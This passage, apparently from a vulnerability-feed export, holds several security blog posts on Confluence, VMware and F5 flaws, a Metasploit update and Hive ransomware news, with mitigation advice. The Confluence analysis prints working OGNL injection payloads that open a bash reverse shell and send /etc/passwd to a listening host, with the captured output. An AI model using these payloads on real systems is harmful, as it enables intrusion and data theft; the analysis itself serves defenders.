evaluation.\n\nThe patch makes a number of small changes to fix this issue. For one, `namespace` is no longer passed down to `TextParseUtil.translateVariables` from `ActionChainResult.execute`:\n\n**Before:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\n**After:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n String finalNamespace = this.namespace;\n String finalActionName = this.actionName;\n \n\nAtlassian also added `SafeExpressionUtil.class` to the `xworks` jar. `SafeExpressionUtil.class` provides filtering of unsafe expressions and has been inserted into `OgnlValueStack.class` in order to examine expressions when `findValue` is invoked. For example:\n \n \n public Object findValue(String expr) {\n try {\n if (expr == null)\n return null; \n if (!this.safeExpressionUtil.isSafeExpression(expr))\n return null; \n if (this.overrides != null && this.overrides.containsKey(expr))\n \n\n### Payloads\n\nThe OGNL injection primitive gives attackers many options. Volexity\u2019s excellent **[Zero-Day Exploitation of Atlassian Confluence](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>)** discusses JSP webshells being dropped to disk. However, Confluence Server should typically execute as `confluence` and not `root`. The `confluence` user is fairly restricted and unable to introduce web shells (to our knowledge).\n\nJava does otherwise provide a wide variety of features that aid in achieving and maintaining execution (both with and without touching disk). It\u2019s impossible to demonstrate all here, but a reverse shell routed through Java\u2019s [Nashorn](<https://docs.oracle.com/javase/10/nashorn/introduction.htm#JSNUG136>) engine is, perhaps, an interesting place for others to explore.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/\n \n\nDecoded, the exploit looks like the following:\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/10.0.0.28/1270 0>&1').start()\")}\n \n\nAnd results in a reverse shell:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37148\n bash: cannot set terminal process group (34470): Inappropriate ioctl for device\n bash: no job control in this shell\n bash: /root/.bashrc: Permission denied\n confluence@ubuntu:/opt/atlassian/confluence/bin$ id\n id\n uid=1001(confluence) gid=1002(confluence) groups=1002(confluence)\n confluence@ubuntu:/opt/atlassian/confluence/bin$\n \n\nOf course, shelling out can be highly risky for attackers if the victim is running some type of threat detection software. Executing in memory only is least likely to get an attacker caught. As an example, we put together a simple exploit that will read `/etc/passwd` and exfiltrate it to the attacker without shelling out.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20data%20%3D%20new%20java.lang.String%28java.nio.file.Files.readAllBytes%28java.nio.file.Paths.get%28%27/etc/passwd%27%29%29%29%3Bvar%20sock%20%3D%20new%20java.net.Socket%28%2710.0.0.28%27%2C%201270%29%3B%20var%20output%20%3D%20new%20java.io.BufferedWriter%28new%20java.io.OutputStreamWriter%28sock.getOutputStream%28%29%29%29%3B%20output.write%28data%29%3B%20output.flush%28%29%3B%20sock.close%28%29%3B%22%29%7D/\n \n\nWhen decoded, the reader can see that we again have relied on the Nashorn scripting engine.\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"var data = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get('/etc/passwd')));var sock = new java.net.Socket('10.0.0.28', 1270); var output = new java.io.BufferedWriter(new java.io.OutputStreamWriter(sock.getOutputStream())); output.write(data); output.flush(); sock.close();\")}\n \n\nAgain, the attacker is listening for the exfiltration which looks, as you\u2019d expect, like `/etc/passd`:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37162\n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n \u2026 truncated \u2026\n \n\nFinally, note that the exploit could be entirely URI-encoded as well. Writing any type of detection logic that relies on **just** the ASCII form will be quickly bypassed.\n\n## Mitigation guidance\n\nAtlassian released patches for CVE-2022-26134 on June 3, 2022. A full list of fixed versions is available in the [advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). A temporary workaround for CVE-2022-26134 is also available\u2014note that the workaround must be manually applied. Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\nOrganizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately. We recommend that all organizations consider implementing IP address safelisting rules to restrict access to Confluence.\n\nIf you are unable to apply safelist IP rules to your Confluence server, consider adding WAF protection. Based on the details published so far, we recommend adding Java deserialization rules that defend against RCE injection vulnerabilities, such as CVE-2021-26084. For example, see the `JavaDeserializationRCE_BODY`, `JavaDeserializationRCE_URI`, `JavaDeserializationRCE_QUERYSTRING`, and `JavaDeserializationRCE_HEADER` rules described [here](<https://docs.aws.amazon.com/waf/latest/developerguide/aws-managed-rule-groups-baseline.html#aws-managed-rule-groups-baseline-known-bad-inputs>).\n\n## Rapid7 customers\n\n**InsightVM and Nexpose:** Customers can assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks as of June 3, 2022:\n\n * A remote check (atlassian-confluence-cve-2022-26134-remote) available in the 3:30 PM EDT content-only release on June 3\n * A remote _version_ check (atlassian-confluence-cve-2022-26134) available in the 9 PM EDT content-only release on June 3\n\n**InsightIDR:** Customers should look for alerts generated by InsightIDR's built-in detection rules from systems monitored by the Insight Agent. Alerts generated by the following rules may be indicative of related malicious activity:\n\n * Confluence Java App Launching Processes\n\nThe Rapid7 MDR (Managed Detection & Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.\n\n**tCell:** Customers leveraging the Java App Server Agent can protect themselves from exploitation by using the OS Commands block capability. For customers leveraging a Web Server Agent, we recommend creating a block rule for any url path starting with `${` or `%24%7B`.\n\n## Updates\n\n**June 3, 2022 11:20 AM EDT:** This blog has been updated to reflect that all supported versions of Confluence Server and Confluence Data Center are affected, and it's likely that **all versions** (including LTS and unsupported) are affected, but Atlassian has not yet determined the earliest vulnerable version.\n\n**June 3, 2022 11:45 AM EDT:** Atlassian has released a temporary workaround for CVE-2022-26134. The workaround must be manually applied. Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\n**June 3, 2022 1:15 PM EDT:** Atlassian has released patches for CVE-2022-26134. A full list of fixed versions is [available in their advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). Rapid7 recommends applying patches OR the temporary workaround (manual) on an **emergency basis.**\n\n**June 3, 2022 3:15 PM EDT:** A full technical analysis of CVE-2022-26134 has been added to this blog to aid security practitioners in understanding and prioritizing this vulnerability. A vulnerability check for InsightVM and Nexpose customers is in active development with a release targeted for this afternoon.\n\n**June 3, 2022 3:30 PM EDT:** InsightVM and Nexpose customers can assess their exposure to CVE-2022-26134 with a remote vulnerability check in today's (June 3, 2022) content release.\n\n**June 6, 2022 10 AM EDT:** A second content release went out the evening of Friday, June 3 containing a remote version check for CVE-2022-26134. This means InsightVM and Nexpose customers are able to assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks.\n\nAttacker activity targeting on-premise instances of Confluence Server and Confluence Data Center has continued to increase. Organizations that have not yet applied the patch or the workaround should **assume compromise** and activate incident response protocols in addition to remediating CVE-2022-26134 on an emergency basis.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T23:27:15", "type": "rapid7blog", "title": "Active Exploitation of Confluence CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", "CVE-2022-26314"], "modified": "2022-06-02T23:27:15", "id": "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "href": "https://blog.rapid7.com/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-20T21:31:04", "description": "\n\nOn May 18, 2022, VMware published [VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) on CVE-2022-22972 and CVE-2022-22973. The more severe of the two vulnerabilities is CVE-2022-22972, a critical authentication bypass affecting VMware\u2019s Workspace ONE Access, Identity Manager, and vRealize Automation solutions. The vulnerability allows attackers with network access to the UI to obtain administrative access without the need to authenticate. CVE-2022-22972 may be chained with CVE-2022-22973 to bypass authentication and obtain root access. A full list of affected products is available in [VMware\u2019s advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>).\n\nAt time of writing, there is no public proof of concept for CVE-2022-22972, and there have been no reports of exploitation in the wild. We expect this to change quickly, however, since Rapid7 researchers have seen [similar VMware vulnerabilities](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis?referrer=blog>) come under attack quickly in recent weeks. In April 2022, we [published details on CVE-2022-22954](<https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/>), a server-side template injection flaw that was widely exploited by threat actors targeting internet-facing VMware Workspace ONE and Identity Manager applications.\n\nIn conjunction with VMware\u2019s advisory on May 18, the US Cybersecurity and Infrastructure Agency (CISA) published [Emergency Directive 22-03](<https://www.cisa.gov/emergency-directive-22-03>) in response to VMSA-2022-0014. The directive requires all \u201cFederal Civilian Executive Branch\u201d agencies to either apply the patch or remove affected VMware installations from agency networks by May 24, 2022. CISA also released an [additional alert](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138b>) emphasizing that threat actors are known to be chaining recent VMware vulnerabilities \u2014 CVE-2022-22954 and CVE-2022-22960 \u2014 to gain full control of vulnerable systems. CISA\u2019s alert notes that the new vulnerabilities in VMSA-2022-0014 are likely to be exploited in the wild quickly:\n\n> Due to the [likely] rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with affected VMware products that are accessible from the internet \u2014 that did not immediately apply updates \u2014 to assume compromise.\n\n## Mitigation guidance\n\nVMware customers should patch their Workspace ONE Access, Identity Manager, and vRealize Automation installations immediately, without waiting for a regular patch cycle to occur. VMware has instructions [here](<https://kb.vmware.com/s/article/88438>) on patching and applying [workarounds](<https://kb.vmware.com/s/article/88098>).\n\nAdditionally, if your installation is internet-facing, consider taking steps to remove direct access from the internet. It may also be prudent to follow CISA\u2019s guidance on post-exploitation detection methods found in [Alert (AA22-138B)](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138b>).\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers will be able to assess their VMware Workspace ONE Access and Identity Manager systems\u2019 exposure to CVE-2022-22972 and CVE-2022-22973 with authenticated vulnerability checks for Unix-like systems available in the May 20, 2022 content release. (Note that VMware Workspace ONE Access is only able to be deployed on Linux from 20.x onward.) Additional vulnerability coverage will be evaluated as the need arises.\n\n_Note: The original version of this blog post indicated that Rapid7 VM customers could expect coverage in the May 19 content release. Due to unforeseen complications with detecting VMware's hotfix patch, there was a delay and the checks will be available in the May 20 content release._\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T13:54:07", "type": "rapid7blog", "title": "CVE-2022-22972: Critical Authentication Bypass in VMware Workspace ONE Access, Identity Manager, and vRealize Automation", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-19T13:54:07", "id": "RAPID7BLOG:A84DC7A15FD5A2A6BF1C8389827A8B0D", "href": "https://blog.rapid7.com/2022/05/19/cve-2022-22972-critical-authentication-bypass-in-vmware-workspace-one-access-identity-manager-and-vrealize-automation/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T19:31:05", "description": "\n\nOn May 4, 2022, F5 released [an advisory](<https://support.f5.com/csp/article/K55879220>) listing several vulnerabilities, including [CVE-2022-1388](<https://support.f5.com/csp/article/K23605346>), a critical authentication bypass that leads to remote code execution in iControl REST with a CVSSv3 base score of 9.8.\n\nThe vulnerability affects several different versions of BIG-IP prior to 17.0.0, including:\n\n * F5 BIG-IP 16.1.0 - 16.1.2 (patched in 16.1.2.2)\n * F5 BIG-IP 15.1.0 - 15.1.5 (patched in 15.1.5.1)\n * F5 BIG-IP 14.1.0 - 14.1.4 (patched in 14.1.4.6)\n * F5 BIG-IP 13.1.0 - 13.1.4 (patched in 13.1.5)\n * F5 BIG-IP 12.1.0 - 12.1.6 (no patch available, will not fix)\n * F5 BIG-IP 11.6.1 - 11.6.5 (no patch available, will not fix)\n\nOn Monday, May 9, 2022, [Horizon3](<https://www.horizon3.ai/>) released a [full proof of concept](<https://github.com/horizon3ai/CVE-2022-1388>), which we successfully executed to get a root shell. Other groups have [developed exploits](<https://www.bleepingcomputer.com/news/security/exploits-created-for-critical-f5-big-ip-flaw-install-patch-immediately/>) as well.\n\nOver the past few days, [BinaryEdge](<https://www.binaryedge.io/>) has detected an increase in [scanning and exploitation](<https://twitter.com/Balgan/status/1523683322446381059>) for F5 BIG-IP. Others on Twitter have also [observed exploitation attempts](<https://twitter.com/1ZRR4H/status/1523572874061422593>). Due to the ease of exploiting this vulnerability, the public exploit code, and the fact that it provides root access, exploitation attempts are likely to increase.\n\nWidespread exploitation is somewhat mitigated by the small number of internet-facing F5 BIG-IP devices, however; our best guess is that there are only [about 2,500 targets on the internet](<https://twitter.com/Junior_Baines/status/1522205355287228416>).\n\n## Mitigation guidance\n\nF5 customers should patch their BIG-IP devices as quickly as possible using [F5's upgrade instructions](<https://support.f5.com/csp/article/K84205182>). Additionally, the management port for F5 BIG-IP devices (and any similar appliance) should be tightly controlled at the network level \u2014 only authorized users should be able to reach the management interface at all.\n\nF5 also [provides a workaround as part of their advisory](<https://support.f5.com/csp/article/K23605346>). If patching and network segmentation are not possible, the workaround should prevent exploitation. We always advise patching rather than relying solely on workarounds.\n\nExploit attempts appear in at least [two different log files](<https://twitter.com/n0x08/status/1523701663290122240>):\n\n * /var/log/audit\n * /var/log/restjavad-audit.0.log\n\nBecause this vulnerability is a root compromise, successful exploitation may be very difficult to recover from. At a minimum, affected BIG-IP devices should be rebuilt from scratch, and certificates and passwords should be rotated.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-1388 with an authenticated [vulnerability check](<https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2022-1388/>) in the May 5, 2022 content release. This release also includes authenticated vulnerability checks for additional CVEs in F5's [May 2022 security advisory](<https://support.f5.com/csp/article/K55879220>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954](<https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/>)_\n * _[Opportunistic Exploitation of WSO2 CVE-2022-29464](<https://www.rapid7.com/blog/post/2022/04/22/opportunistic-exploitation-of-wso2-cve-2022-29464/>)_\n * _[Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>)_\n * _[CVE-2022-0847: Arbitrary File Overwrite Vulnerability in Linux Kernel](<https://www.rapid7.com/blog/post/2022/03/09/cve-2022-0847-arbitrary-file-overwrite-vulnerability-in-linux-kernel/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T17:57:00", "type": "rapid7blog", "title": "Active Exploitation of F5 BIG-IP iControl REST CVE-2022-1388", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0847", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22965", "CVE-2022-29464"], "modified": "2022-05-09T17:57:00", "id": "RAPID7BLOG:07CA09B4E3B3835E096AA56546C43E8E", "href": "https://blog.rapid7.com/2022/05/09/active-exploitation-of-f5-big-ip-icontrol-rest-cve-2022-1388/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T15:05:39", "description": "## We just couldn't contain ourselves!\n\n\n\nThis week we've got two Kubernetes modules coming at you from [adfoster-r7](<https://github.com/adfoster-r7>) and [smcintyre-r7](<https://github.com/smcintyre-r7>). First up is an enum module `auxiliary/cloud/kubernetes/enum_kubernetes` that'll extract a variety of information including the namespaces, pods, secrets, service token information, and the Kubernetes environment version! Next is an authenticated code execution module `exploit/multi/kubernetes/exec` (which shipped with a new websocket implementation, too, by the way) that will spin up a new pod with a Meterpreter payload for you provided you have the Kubernetes JWT token and access to the Kubernetes REST API. These modules can even be run through a compromised container that may be running on the Kubernetes cluster.\n\n## Atlassian Confluence WebWork OGNL Injection gets Windows support\n\nYou might remember [Confluence Server CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>) making an appearance in a wrap-up last month, and it's back! Rapid7\u2019s own [wvu-r7](<https://github.com/wvu-r7>) has updated his Confluence Server exploit to support Windows targets.\n\n## New module content (2)\n\n * [Kubernetes Enumeration](<https://github.com/rapid7/metasploit-framework/pull/15786>) by Spencer McIntyre and Alan Foster - This adds a module for enumerating Kubernetes environments. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. It will extract a variety of information including the namespaces, pods, secrets and version.\n * [Kubernetes authenticated code execution](<https://github.com/rapid7/metasploit-framework/pull/15733>) by Spencer McIntyre and Alan Foster - Adds a new `exploit/multi/kubernetes/exec` module. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. The module creates a new pod which will execute a Meterpreter payload to open a new session, as well as mounting the host's file system when possible.\n\n## Enhancements and features\n\n * [#15732](<https://github.com/rapid7/metasploit-framework/pull/15732>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Adds terminal size synchronisation for fully interactive shells against Linux environments with `shell -it`. This functionality is behind a feature flag and can be enabled with `features set fully_interactive_shells true`.\n * [#15769](<https://github.com/rapid7/metasploit-framework/pull/15769>) from [wvu-r7](<https://github.com/wvu-r7>) \\- Added Windows support to the Atlassian Confluence CVE-2021-26084 exploit.\n * [#15773](<https://github.com/rapid7/metasploit-framework/pull/15773>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds a collection of useful commands for configuring a local or remote Kubernetes environment to aid with testing and exploring Metasploit's Kubernetes modules and pivoting capabilities. The resource files include deploying two vulnerable applications, and populating secrets which can be extracted and stored as loot, as well as utility commands for creating admin and service account tokens.\n\n## Bugs fixed\n\n * [#15760](<https://github.com/rapid7/metasploit-framework/pull/15760>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an issue when attempting to store JSON loot, where the extension was always being set to `bin` instead of `json`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-13T09%3A47%3A12-05%3A00..2021-10-21T11%3A22%3A54-04%3A00%22>)\n * [Full diff 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/compare/6.1.10...6.1.11>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-10-22T14:25:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T14:25:55", "id": "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "href": "https://blog.rapid7.com/2021/10/22/metasploit-wrap-up-135/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgG4LpJKxqUO2-qxnPcHk7kZshWlpcUJf4apWnuuu8g9A2r0wcvybcwpf7lOoNA63j4bRBhFvjSOcGs6VNIFsmjXTIplZEkjAFtBn3cM6NGJ0rIS2GGGAKNgL2WQIm_-fjXlryklUzygBckkBMBoeHlXhheLR9onLzGHVYPSgJnrJE7GbCsqTLo57hD/s728-e100/hive-ransomware.jpg>)\n\nA recent Hive ransomware attack carried out by an affiliate involved the exploitation of \"ProxyShell\" vulnerabilities in the Microsoft Exchange Server that were disclosed last year to encrypt an unnamed customer's network.\n\n\"The actor managed to achieve its malicious goals and encrypt the environment in less than 72 hours from the initial compromise,\" Varonis security researcher, Nadav Ovadia, [said](<https://www.varonis.com/blog/hive-ransomware-analysis>) in a post-mortem analysis of the incident. \n\nHive, which was [first observed](<https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html>) in June 2021, follows the lucrative ransomware-as-a-service (RaaS) scheme adopted by other cybercriminal groups in recent years, enabling affiliates to deploy the file-encrypting malware after gaining a foothold into their victims' networks.\n\n[ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) \u2014 tracked as CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473 \u2014 involves a combination of security feature bypass, privilege escalation, and remote code execution in the Microsoft Exchange Server, effectively granting the attacker the ability to execute arbitrary code on affected servers.\n\nThe issues were addressed by Microsoft as part of its Patch Tuesday updates for April and May 2021.\n\nIn this case, successful exploitation of the flaws allowed the adversary to deploy web shells on the compromised server, using them to run malicious PowerShell code with SYSTEM privileges to create a new backdoor administrator user, hijack the domain admin account, and perform lateral movement.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgbU5YaGjiHhZvFPL5Fqh7rHbVldX6X-unk-Mq6dP0icasfzkogYQnkRDy9ZUNWr3oca2oh6FGdjSzMm5uyXe1DLzwsty4H8hXGZia0azIu3Q24ZyBwemMQXMvu5dpzZQn-9MUl_WWAG5opQBaoXlyg6Esg2eBVWtdYcBrz5l7yZPDtCD1v9nzKF-D8/s728-e100/hive.jpg>)\n\nThe web shells used in the attack are said to have been sourced from a [public git repository](<https://github.com/ThePacketBender/webshells>) and given filenames containing a random mix of characters to evade detection, Ovadia said. Also executed was an additional obfuscated PowerShell script that's part of the Cobalt Strike framework.\n\nFrom there, the threat actor moved to scan the network for valuable files, before proceeding to deploy the Golang ransomware executable (named \"Windows.exe\") to complete the encryption process and display the ransom note to the victim.\n\nOther operations carried out by the malware include deleting shadow copies, turning off security products, and clearing Windows event logs to avoid detection, prevent recovery, and ensure that the encryption happens without any hiccup.\n\nIf anything, the findings are yet another indicator that patching for known vulnerabilities is key to thwarting cyberattacks and other nefarious activities.\n\n\"Ransomware attacks have grown significantly over the past years and remain the preferred method of threat actors aiming to maximize profits,\" Ovadia said. \"It may potentially harm an organization's reputation, disrupt regular operations and lead to temporary, and possibly permanent, loss of sensitive data.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T10:00:00", "type": "thn", "title": "New Incident Report Reveals How Hive Ransomware Targets Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-21T10:00:58", "id": "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "href": "https://thehackernews.com/2022/04/new-incident-report-reveals-how-hive.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEihM5iYK8V59Az6V_QU4QfgIeRF_0hGVdMPzkolUAVIW-fNuFPicRQP8GVCKVzA_FETzCTUZXWBI67kH6LRZTLGCO5eI9UumwAso17F_kIigeX8Y7Z41AMwAPgq1iysoZkTTX-VU5eO4nCRvjFq57tq6FcnFZd3DBb3A8kWOZ253GJWm-fH0WFE7Fna>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency is warning of active exploitation attempts that leverage the latest line of 